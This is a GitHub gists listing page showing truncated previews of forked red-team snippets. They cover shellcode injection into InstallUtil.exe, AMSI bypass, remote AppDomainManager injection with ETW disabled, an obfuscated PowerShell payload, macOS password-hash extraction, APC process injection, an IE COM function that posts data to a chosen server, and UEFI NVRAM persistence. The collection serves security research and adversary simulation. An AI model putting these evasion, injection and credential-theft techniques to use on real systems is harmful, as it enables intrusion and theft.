Skip to content

Instantly share code, notes, and snippets.

View rmusser01's full-sized avatar
💯
¯\_(ツ)_/¯

Robert rmusser01

💯
¯\_(ツ)_/¯
600 followers · 318 following
View GitHub Profile
@rmusser01
rmusser01 / rwxHunter.cs
Created November 8, 2021 01:33 — forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@rmusser01
rmusser01 / veh_AmsiBypass.cpp
Created July 20, 2021 15:12 — forked from aaaddress1/veh_AmsiBypass.cpp
(VEH) AMSI Bypass without Memory Patch
// Exception-Based AMSI Bypass
// by [email protected]
#include <amsi.h>
#include <iostream>
#include <Windows.h>
#pragma comment(lib, "amsi.lib")
#pragma comment(lib, "ole32.lib")
#pragma warning( disable : 4996 )
#define AMSIPROJECTNAME L"scanner"
@rmusser01
rmusser01 / README.md
Created April 28, 2021 01:04 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
@rmusser01
rmusser01 / logfile-final-payload-anon.ps1
Created March 2, 2021 02:29 — forked from jdferrell3/logfile-final-payload-anon.ps1
function rsrzis {
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
$ErrorActionPreference = "SilentlyContinue";
function wlc2 {
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
@rmusser01
rmusser01 / osx_extract_hash.py
Created January 29, 2021 03:24 — forked from teddziuba/osx_extract_hash.py
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
#!/usr/bin/env python3
"""
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
@rmusser01
rmusser01 / DInjectQueuerAPC.cs
Created November 15, 2020 17:04 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@rmusser01
rmusser01 / Update_Notes.md
Created November 11, 2020 05:53
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@rmusser01
rmusser01 / ie_com.cs
Created October 30, 2020 17:46 — forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
@rmusser01
rmusser01 / mscorlib_load_assembly.vba
Created October 30, 2020 17:44 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@rmusser01
rmusser01 / _README.md
Created August 19, 2020 06:11 — forked from jthuraisamy/_README.md
GospelRoom: Data Storage in UEFI NVRAM Variables

GospelRoom: Data Storage in UEFI NVRAM Variables

Behaviour

Persist data in UEFI NVRAM variables.

Benefits

  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.